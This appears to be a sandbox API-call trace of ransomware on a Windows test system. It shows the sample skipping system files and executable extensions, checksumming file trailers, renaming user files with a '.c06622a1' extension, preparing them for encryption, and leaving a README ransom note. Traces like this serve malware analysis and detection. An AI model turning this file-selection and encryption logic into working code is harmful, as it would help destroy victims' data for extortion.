[0148.262] wcslen (_String="autorun.inf") returned 0xb [0148.262] _wcsicmp (_Str1="boot.ini", _Str2="lwV 0hsOIy.bmp") returned -10 [0148.262] wcslen (_String="boot.ini") returned 0x8 [0148.262] _wcsicmp (_Str1="bootfont.bin", _Str2="lwV 0hsOIy.bmp") returned -10 [0148.262] wcslen (_String="bootfont.bin") returned 0xc [0148.262] _wcsicmp (_Str1="bootsect.bak", _Str2="lwV 0hsOIy.bmp") returned -10 [0148.262] wcslen (_String="bootsect.bak") returned 0xc [0148.262] _wcsicmp (_Str1="desktop.ini", _Str2="lwV 0hsOIy.bmp") returned -8 [0148.262] wcslen (_String="desktop.ini") returned 0xb [0148.262] _wcsicmp (_Str1="iconcache.db", _Str2="lwV 0hsOIy.bmp") returned -3 [0148.263] wcslen (_String="iconcache.db") returned 0xc [0148.263] _wcsicmp (_Str1="ntldr", _Str2="lwV 0hsOIy.bmp") returned 2 [0148.263] wcslen (_String="ntldr") returned 0x5 [0148.263] _wcsicmp (_Str1="ntuser.dat", _Str2="lwV 0hsOIy.bmp") returned 2 [0148.263] wcslen (_String="ntuser.dat") returned 0xa [0148.263] _wcsicmp (_Str1="ntuser.dat.log", _Str2="lwV 0hsOIy.bmp") returned 2 [0148.263] wcslen (_String="ntuser.dat.log") returned 0xe [0148.263] _wcsicmp (_Str1="ntuser.ini", _Str2="lwV 0hsOIy.bmp") returned 2 [0148.263] wcslen (_String="ntuser.ini") returned 0xa [0148.263] _wcsicmp (_Str1="thumbs.db", _Str2="lwV 0hsOIy.bmp") returned 8 [0148.263] wcslen (_String="thumbs.db") returned 0x9 [0148.263] _wcsicmp (_Str1="386", _Str2="bmp") returned -47 [0148.263] wcslen (_String="386") returned 0x3 [0148.263] _wcsicmp (_Str1="adv", _Str2="bmp") returned -1 [0148.263] wcslen (_String="adv") returned 0x3 [0148.263] _wcsicmp (_Str1="ani", _Str2="bmp") returned -1 [0148.263] wcslen (_String="ani") returned 0x3 [0148.263] _wcsicmp (_Str1="bat", _Str2="bmp") returned -12 [0148.263] wcslen (_String="bat") returned 0x3 [0148.263] _wcsicmp (_Str1="bin", _Str2="bmp") returned -4 [0148.263] wcslen (_String="bin") returned 0x3 [0148.263] _wcsicmp (_Str1="cab", _Str2="bmp") returned 1 [0148.263] wcslen (_String="cab") returned 0x3 [0148.263] _wcsicmp (_Str1="cmd", _Str2="bmp") returned 1 [0148.263] wcslen (_String="cmd") returned 0x3 [0148.263] _wcsicmp (_Str1="com", _Str2="bmp") returned 1 [0148.263] wcslen (_String="com") returned 0x3 [0148.263] _wcsicmp (_Str1="cpl", _Str2="bmp") returned 1 [0148.263] wcslen (_String="cpl") returned 0x3 [0148.263] _wcsicmp (_Str1="cur", _Str2="bmp") returned 1 [0148.263] wcslen (_String="cur") returned 0x3 [0148.263] _wcsicmp (_Str1="deskthemepack", _Str2="bmp") returned 2 [0148.263] wcslen (_String="deskthemepack") returned 0xd [0148.263] _wcsicmp (_Str1="diagcab", _Str2="bmp") returned 2 [0148.263] wcslen (_String="diagcab") returned 0x7 [0148.263] _wcsicmp (_Str1="diagcfg", _Str2="bmp") returned 2 [0148.263] wcslen (_String="diagcfg") returned 0x7 [0148.264] _wcsicmp (_Str1="diagpkg", _Str2="bmp") returned 2 [0148.264] wcslen (_String="diagpkg") returned 0x7 [0148.264] _wcsicmp (_Str1="dll", _Str2="bmp") returned 2 [0148.264] wcslen (_String="dll") returned 0x3 [0148.264] _wcsicmp (_Str1="drv", _Str2="bmp") returned 2 [0148.264] wcslen (_String="drv") returned 0x3 [0148.264] _wcsicmp (_Str1="exe", _Str2="bmp") returned 3 [0148.264] wcslen (_String="exe") returned 0x3 [0148.264] _wcsicmp (_Str1="hlp", _Str2="bmp") returned 6 [0148.264] wcslen (_String="hlp") returned 0x3 [0148.264] _wcsicmp (_Str1="icl", _Str2="bmp") returned 7 [0148.264] wcslen (_String="icl") returned 0x3 [0148.264] _wcsicmp (_Str1="icns", _Str2="bmp") returned 7 [0148.264] wcslen (_String="icns") returned 0x4 [0148.264] _wcsicmp (_Str1="ico", _Str2="bmp") returned 7 [0148.264] wcslen (_String="ico") returned 0x3 [0148.264] _wcsicmp (_Str1="ics", _Str2="bmp") returned 7 [0148.264] wcslen (_String="ics") returned 0x3 [0148.264] _wcsicmp (_Str1="idx", _Str2="bmp") returned 7 [0148.264] wcslen (_String="idx") returned 0x3 [0148.264] _wcsicmp (_Str1="ldf", _Str2="bmp") returned 10 [0148.264] wcslen (_String="ldf") returned 0x3 [0148.264] _wcsicmp (_Str1="lnk", _Str2="bmp") returned 10 [0148.264] wcslen (_String="lnk") returned 0x3 [0148.264] _wcsicmp (_Str1="mod", _Str2="bmp") returned 11 [0148.264] wcslen (_String="mod") returned 0x3 [0148.264] _wcsicmp (_Str1="mpa", _Str2="bmp") returned 11 [0148.264] wcslen (_String="mpa") returned 0x3 [0148.264] _wcsicmp (_Str1="msc", _Str2="bmp") returned 11 [0148.264] wcslen (_String="msc") returned 0x3 [0148.264] _wcsicmp (_Str1="msp", _Str2="bmp") returned 11 [0148.264] wcslen (_String="msp") returned 0x3 [0148.264] _wcsicmp (_Str1="msstyles", _Str2="bmp") returned 11 [0148.264] wcslen (_String="msstyles") returned 0x8 [0148.264] _wcsicmp (_Str1="msu", _Str2="bmp") returned 11 [0148.264] wcslen (_String="msu") returned 0x3 [0148.264] _wcsicmp (_Str1="nls", _Str2="bmp") returned 12 [0148.264] wcslen (_String="nls") returned 0x3 [0148.265] _wcsicmp (_Str1="nomedia", _Str2="bmp") returned 12 [0148.265] wcslen (_String="nomedia") returned 0x7 [0148.265] _wcsicmp (_Str1="ocx", _Str2="bmp") returned 13 [0148.265] wcslen (_String="ocx") returned 0x3 [0148.265] _wcsicmp (_Str1="prf", _Str2="bmp") returned 14 [0148.265] wcslen (_String="prf") returned 0x3 [0148.265] _wcsicmp (_Str1="ps1", _Str2="bmp") returned 14 [0148.265] wcslen (_String="ps1") returned 0x3 [0148.265] _wcsicmp (_Str1="rom", _Str2="bmp") returned 16 [0148.265] wcslen (_String="rom") returned 0x3 [0148.265] _wcsicmp (_Str1="rtp", _Str2="bmp") returned 16 [0148.265] wcslen (_String="rtp") returned 0x3 [0148.265] _wcsicmp (_Str1="scr", _Str2="bmp") returned 17 [0148.265] wcslen (_String="scr") returned 0x3 [0148.265] _wcsicmp (_Str1="shs", _Str2="bmp") returned 17 [0148.265] wcslen (_String="shs") returned 0x3 [0148.265] _wcsicmp (_Str1="spl", _Str2="bmp") returned 17 [0148.265] wcslen (_String="spl") returned 0x3 [0148.265] _wcsicmp (_Str1="sys", _Str2="bmp") returned 17 [0148.265] wcslen (_String="sys") returned 0x3 [0148.265] _wcsicmp (_Str1="theme", _Str2="bmp") returned 18 [0148.265] wcslen (_String="theme") returned 0x5 [0148.265] _wcsicmp (_Str1="themepack", _Str2="bmp") returned 18 [0148.265] wcslen (_String="themepack") returned 0x9 [0148.265] _wcsicmp (_Str1="wpx", _Str2="bmp") returned 21 [0148.265] wcslen (_String="wpx") returned 0x3 [0148.265] _wcsicmp (_Str1="lock", _Str2="bmp") returned 10 [0148.265] wcslen (_String="lock") returned 0x4 [0148.265] _wcsicmp (_Str1="key", _Str2="bmp") returned 9 [0148.265] wcslen (_String="key") returned 0x3 [0148.265] _wcsicmp (_Str1="hta", _Str2="bmp") returned 6 [0148.265] wcslen (_String="hta") returned 0x3 [0148.265] _wcsicmp (_Str1="msi", _Str2="bmp") returned 11 [0148.265] wcslen (_String="msi") returned 0x3 [0148.265] _wcsicmp (_Str1="pdb", _Str2="bmp") returned 14 [0148.265] wcslen (_String="pdb") returned 0x3 [0148.265] _wcsicmp (_Str1="sql", _Str2="bmp") returned 17 [0148.265] wcslen (_String="sql") returned 0x3 [0148.266] _wcsicmp (_Str1="sqlite", _Str2="bmp") returned 17 [0148.266] wcslen (_String="sqlite") returned 0x6 [0148.266] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w\\tj6eednauo4l9hn")) returned 0x10 [0148.266] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45300a8 [0148.266] wcscpy (in: _Dest=0x45300a8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn" [0148.266] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn") returned 0x45 [0148.266] wcscpy (in: _Dest=0x4530134, _Source="lwV 0hsOIy.bmp" | out: _Dest="lwV 0hsOIy.bmp") returned="lwV 0hsOIy.bmp" [0148.266] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn\\lwV 0hsOIy.bmp", dwFileAttributes=0x80) returned 1 [0148.266] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn\\lwV 0hsOIy.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w\\tj6eednauo4l9hn\\lwv 0hsoiy.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0148.266] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.266] ReadFile (in: hFile=0x640, lpBuffer=0x3fe674, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe704, lpOverlapped=0x0 | out: lpBuffer=0x3fe674*, lpNumberOfBytesRead=0x3fe704*=0x90, lpOverlapped=0x0) returned 1 [0148.267] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe674, Length=0x80) returned 0xcba11561 [0148.267] RtlComputeCrc32 (PartialCrc=0x1561, Buffer=0x3fe674, Length=0x80) returned 0x9a21803d [0148.267] RtlComputeCrc32 (PartialCrc=0x803d, Buffer=0x3fe674, Length=0x80) returned 0x4936193f [0148.267] RtlComputeCrc32 (PartialCrc=0x193f, Buffer=0x3fe674, Length=0x80) returned 0xa092baeb [0148.267] RtlComputeCrc32 (PartialCrc=0xbaeb, Buffer=0x3fe674, Length=0x80) returned 0x47c58521 [0148.267] CloseHandle (hObject=0x640) returned 1 [0148.267] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45400b0 [0148.267] wcscpy (in: _Dest=0x45400b0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn\\lwV 0hsOIy.bmp" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn\\lwV 0hsOIy.bmp") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn\\lwV 0hsOIy.bmp" [0148.267] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn\\lwV 0hsOIy.bmp") returned 0x54 [0148.267] wcscpy (in: _Dest=0x4540158, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0148.267] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn\\lwV 0hsOIy.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w\\tj6eednauo4l9hn\\lwv 0hsoiy.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn\\lwV 0hsOIy.bmp.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w\\tj6eednauo4l9hn\\lwv 0hsoiy.bmp.c06622a1"), dwFlags=0x8) returned 1 [0148.269] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn\\lwV 0hsOIy.bmp.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w\\tj6eednauo4l9hn\\lwv 0hsoiy.bmp.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x640 [0148.269] CreateIoCompletionPort (FileHandle=0x640, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0148.269] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4790020 [0148.274] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7a008e2c [0148.274] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7c4710de [0148.274] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x157b36ef [0148.274] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5c82ac3a [0148.274] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x775a8c57 [0148.274] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7a417261 [0148.274] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5df7a39a [0148.274] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3047cdbb [0148.278] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4790094, Length=0x80) returned 0xdc24bd31 [0148.278] RtlComputeCrc32 (PartialCrc=0xbd31, Buffer=0x4790094, Length=0x80) returned 0x7d0bf5c0 [0148.278] RtlComputeCrc32 (PartialCrc=0xf5c0, Buffer=0x4790094, Length=0x80) returned 0xff218927 [0148.278] RtlComputeCrc32 (PartialCrc=0x8927, Buffer=0x4790094, Length=0x80) returned 0xdcf9bbda [0148.278] RtlComputeCrc32 (PartialCrc=0xbbda, Buffer=0x4790094, Length=0x80) returned 0xdfef61a7 [0148.278] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4790020) returned 1 [0148.278] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45300a8) returned 1 [0148.278] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45400b0) returned 1 [0148.278] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6f1ac00, ftCreationTime.dwHighDateTime=0x1d6f256, ftLastAccessTime.dwLowDateTime=0xd6f1ac00, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xd6f1ac00, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0xa8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0148.278] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0148.278] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0148.278] FindClose (in: hFindFile=0x2db87c0 | out: hFindFile=0x2db87c0) returned 1 [0148.278] _wcsicmp (_Str1="backup", _Str2="TJ6EEdNAUO4l9hn") returned -18 [0148.279] wcslen (_String="backup") returned 0x6 [0148.279] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0148.279] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0148.279] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x945d0da0, ftCreationTime.dwHighDateTime=0x1d5deb9, ftLastAccessTime.dwLowDateTime=0x210ab160, ftLastAccessTime.dwHighDateTime=0x1d5df34, ftLastWriteTime.dwLowDateTime=0x210ab160, ftLastWriteTime.dwHighDateTime=0x1d5df34, nFileSizeHigh=0x0, nFileSizeLow=0x10550, dwReserved0=0x0, dwReserved1=0x0, cFileName="Z6MOpJ7HjT.mkv", cAlternateFileName="Z6MOPJ~1.MKV")) returned 1 [0148.279] _wcsicmp (_Str1="Z6MOpJ7HjT.mkv", _Str2="README.c06622a1.TXT") returned 8 [0148.279] wcsstr (_Str="Z6MOpJ7HjT.mkv", _SubStr="README") returned 0x0 [0148.279] _wcsicmp (_Str1="autorun.inf", _Str2="Z6MOpJ7HjT.mkv") returned -25 [0148.279] wcslen (_String="autorun.inf") returned 0xb [0148.279] _wcsicmp (_Str1="boot.ini", _Str2="Z6MOpJ7HjT.mkv") returned -24 [0148.279] wcslen (_String="boot.ini") returned 0x8 [0148.279] _wcsicmp (_Str1="bootfont.bin", _Str2="Z6MOpJ7HjT.mkv") returned -24 [0148.279] wcslen (_String="bootfont.bin") returned 0xc [0148.279] _wcsicmp (_Str1="bootsect.bak", _Str2="Z6MOpJ7HjT.mkv") returned -24 [0148.279] wcslen (_String="bootsect.bak") returned 0xc [0148.279] _wcsicmp (_Str1="desktop.ini", _Str2="Z6MOpJ7HjT.mkv") returned -22 [0148.279] wcslen (_String="desktop.ini") returned 0xb [0148.279] _wcsicmp (_Str1="iconcache.db", _Str2="Z6MOpJ7HjT.mkv") returned -17 [0148.279] wcslen (_String="iconcache.db") returned 0xc [0148.279] _wcsicmp (_Str1="ntldr", _Str2="Z6MOpJ7HjT.mkv") returned -12 [0148.279] wcslen (_String="ntldr") returned 0x5 [0148.279] _wcsicmp (_Str1="ntuser.dat", _Str2="Z6MOpJ7HjT.mkv") returned -12 [0148.279] wcslen (_String="ntuser.dat") returned 0xa [0148.279] _wcsicmp (_Str1="ntuser.dat.log", _Str2="Z6MOpJ7HjT.mkv") returned -12 [0148.279] wcslen (_String="ntuser.dat.log") returned 0xe [0148.279] _wcsicmp (_Str1="ntuser.ini", _Str2="Z6MOpJ7HjT.mkv") returned -12 [0148.279] wcslen (_String="ntuser.ini") returned 0xa [0148.279] _wcsicmp (_Str1="thumbs.db", _Str2="Z6MOpJ7HjT.mkv") returned -6 [0148.279] wcslen (_String="thumbs.db") returned 0x9 [0148.279] _wcsicmp (_Str1="386", _Str2="mkv") returned -58 [0148.279] wcslen (_String="386") returned 0x3 [0148.279] _wcsicmp (_Str1="adv", _Str2="mkv") returned -12 [0148.279] wcslen (_String="adv") returned 0x3 [0148.279] _wcsicmp (_Str1="ani", _Str2="mkv") returned -12 [0148.279] wcslen (_String="ani") returned 0x3 [0148.279] _wcsicmp (_Str1="bat", _Str2="mkv") returned -11 [0148.280] wcslen (_String="bat") returned 0x3 [0148.280] _wcsicmp (_Str1="bin", _Str2="mkv") returned -11 [0148.280] wcslen (_String="bin") returned 0x3 [0148.280] _wcsicmp (_Str1="cab", _Str2="mkv") returned -10 [0148.280] wcslen (_String="cab") returned 0x3 [0148.280] _wcsicmp (_Str1="cmd", _Str2="mkv") returned -10 [0148.280] wcslen (_String="cmd") returned 0x3 [0148.280] _wcsicmp (_Str1="com", _Str2="mkv") returned -10 [0148.280] wcslen (_String="com") returned 0x3 [0148.280] _wcsicmp (_Str1="cpl", _Str2="mkv") returned -10 [0148.280] wcslen (_String="cpl") returned 0x3 [0148.280] _wcsicmp (_Str1="cur", _Str2="mkv") returned -10 [0148.280] wcslen (_String="cur") returned 0x3 [0148.280] _wcsicmp (_Str1="deskthemepack", _Str2="mkv") returned -9 [0148.280] wcslen (_String="deskthemepack") returned 0xd [0148.280] _wcsicmp (_Str1="diagcab", _Str2="mkv") returned -9 [0148.280] wcslen (_String="diagcab") returned 0x7 [0148.280] _wcsicmp (_Str1="diagcfg", _Str2="mkv") returned -9 [0148.280] wcslen (_String="diagcfg") returned 0x7 [0148.280] _wcsicmp (_Str1="diagpkg", _Str2="mkv") returned -9 [0148.280] wcslen (_String="diagpkg") returned 0x7 [0148.280] _wcsicmp (_Str1="dll", _Str2="mkv") returned -9 [0148.280] wcslen (_String="dll") returned 0x3 [0148.280] _wcsicmp (_Str1="drv", _Str2="mkv") returned -9 [0148.280] wcslen (_String="drv") returned 0x3 [0148.280] _wcsicmp (_Str1="exe", _Str2="mkv") returned -8 [0148.280] wcslen (_String="exe") returned 0x3 [0148.280] _wcsicmp (_Str1="hlp", _Str2="mkv") returned -5 [0148.280] wcslen (_String="hlp") returned 0x3 [0148.280] _wcsicmp (_Str1="icl", _Str2="mkv") returned -4 [0148.280] wcslen (_String="icl") returned 0x3 [0148.280] _wcsicmp (_Str1="icns", _Str2="mkv") returned -4 [0148.280] wcslen (_String="icns") returned 0x4 [0148.280] _wcsicmp (_Str1="ico", _Str2="mkv") returned -4 [0148.280] wcslen (_String="ico") returned 0x3 [0148.280] _wcsicmp (_Str1="ics", _Str2="mkv") returned -4 [0148.280] wcslen (_String="ics") returned 0x3 [0148.281] _wcsicmp (_Str1="idx", _Str2="mkv") returned -4 [0148.281] wcslen (_String="idx") returned 0x3 [0148.281] _wcsicmp (_Str1="ldf", _Str2="mkv") returned -1 [0148.281] wcslen (_String="ldf") returned 0x3 [0148.281] _wcsicmp (_Str1="lnk", _Str2="mkv") returned -1 [0148.281] wcslen (_String="lnk") returned 0x3 [0148.281] _wcsicmp (_Str1="mod", _Str2="mkv") returned 4 [0148.281] wcslen (_String="mod") returned 0x3 [0148.281] _wcsicmp (_Str1="mpa", _Str2="mkv") returned 5 [0148.281] wcslen (_String="mpa") returned 0x3 [0148.281] _wcsicmp (_Str1="msc", _Str2="mkv") returned 8 [0148.281] wcslen (_String="msc") returned 0x3 [0148.281] _wcsicmp (_Str1="msp", _Str2="mkv") returned 8 [0148.281] wcslen (_String="msp") returned 0x3 [0148.281] _wcsicmp (_Str1="msstyles", _Str2="mkv") returned 8 [0148.281] wcslen (_String="msstyles") returned 0x8 [0148.281] _wcsicmp (_Str1="msu", _Str2="mkv") returned 8 [0148.281] wcslen (_String="msu") returned 0x3 [0148.281] _wcsicmp (_Str1="nls", _Str2="mkv") returned 1 [0148.281] wcslen (_String="nls") returned 0x3 [0148.281] _wcsicmp (_Str1="nomedia", _Str2="mkv") returned 1 [0148.281] wcslen (_String="nomedia") returned 0x7 [0148.281] _wcsicmp (_Str1="ocx", _Str2="mkv") returned 2 [0148.281] wcslen (_String="ocx") returned 0x3 [0148.281] _wcsicmp (_Str1="prf", _Str2="mkv") returned 3 [0148.281] wcslen (_String="prf") returned 0x3 [0148.281] _wcsicmp (_Str1="ps1", _Str2="mkv") returned 3 [0148.281] wcslen (_String="ps1") returned 0x3 [0148.281] _wcsicmp (_Str1="rom", _Str2="mkv") returned 5 [0148.281] wcslen (_String="rom") returned 0x3 [0148.281] _wcsicmp (_Str1="rtp", _Str2="mkv") returned 5 [0148.281] wcslen (_String="rtp") returned 0x3 [0148.281] _wcsicmp (_Str1="scr", _Str2="mkv") returned 6 [0148.281] wcslen (_String="scr") returned 0x3 [0148.281] _wcsicmp (_Str1="shs", _Str2="mkv") returned 6 [0148.281] wcslen (_String="shs") returned 0x3 [0148.281] _wcsicmp (_Str1="spl", _Str2="mkv") returned 6 [0148.281] wcslen (_String="spl") returned 0x3 [0148.282] _wcsicmp (_Str1="sys", _Str2="mkv") returned 6 [0148.282] wcslen (_String="sys") returned 0x3 [0148.282] _wcsicmp (_Str1="theme", _Str2="mkv") returned 7 [0148.282] wcslen (_String="theme") returned 0x5 [0148.282] _wcsicmp (_Str1="themepack", _Str2="mkv") returned 7 [0148.282] wcslen (_String="themepack") returned 0x9 [0148.282] _wcsicmp (_Str1="wpx", _Str2="mkv") returned 10 [0148.282] wcslen (_String="wpx") returned 0x3 [0148.282] _wcsicmp (_Str1="lock", _Str2="mkv") returned -1 [0148.282] wcslen (_String="lock") returned 0x4 [0148.282] _wcsicmp (_Str1="key", _Str2="mkv") returned -2 [0148.282] wcslen (_String="key") returned 0x3 [0148.282] _wcsicmp (_Str1="hta", _Str2="mkv") returned -5 [0148.282] wcslen (_String="hta") returned 0x3 [0148.282] _wcsicmp (_Str1="msi", _Str2="mkv") returned 8 [0148.282] wcslen (_String="msi") returned 0x3 [0148.282] _wcsicmp (_Str1="pdb", _Str2="mkv") returned 3 [0148.282] wcslen (_String="pdb") returned 0x3 [0148.282] _wcsicmp (_Str1="sql", _Str2="mkv") returned 6 [0148.282] wcslen (_String="sql") returned 0x3 [0148.282] _wcsicmp (_Str1="sqlite", _Str2="mkv") returned 6 [0148.282] wcslen (_String="sqlite") returned 0x6 [0148.282] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w")) returned 0x10 [0148.282] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0148.282] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w" [0148.282] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w") returned 0x35 [0148.282] wcscpy (in: _Dest=0x45000fc, _Source="Z6MOpJ7HjT.mkv" | out: _Dest="Z6MOpJ7HjT.mkv") returned="Z6MOpJ7HjT.mkv" [0148.282] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\Z6MOpJ7HjT.mkv", dwFileAttributes=0x80) returned 1 [0148.283] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\Z6MOpJ7HjT.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w\\z6mopj7hjt.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0148.283] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.283] ReadFile (in: hFile=0x644, lpBuffer=0x3fe8f4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe984, lpOverlapped=0x0 | out: lpBuffer=0x3fe8f4*, lpNumberOfBytesRead=0x3fe984*=0x90, lpOverlapped=0x0) returned 1 [0148.283] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe8f4, Length=0x80) returned 0xbfb6ef0c [0148.283] RtlComputeCrc32 (PartialCrc=0xef0c, Buffer=0x3fe8f4, Length=0x80) returned 0x77d5404c [0148.283] RtlComputeCrc32 (PartialCrc=0x404c, Buffer=0x3fe8f4, Length=0x80) returned 0x44aba49b [0148.283] RtlComputeCrc32 (PartialCrc=0xa49b, Buffer=0x3fe8f4, Length=0x80) returned 0x987482b3 [0148.284] RtlComputeCrc32 (PartialCrc=0x82b3, Buffer=0x3fe8f4, Length=0x80) returned 0x37a9b952 [0148.284] CloseHandle (hObject=0x644) returned 1 [0148.284] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0148.284] wcscpy (in: _Dest=0x4510098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\Z6MOpJ7HjT.mkv" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\Z6MOpJ7HjT.mkv") 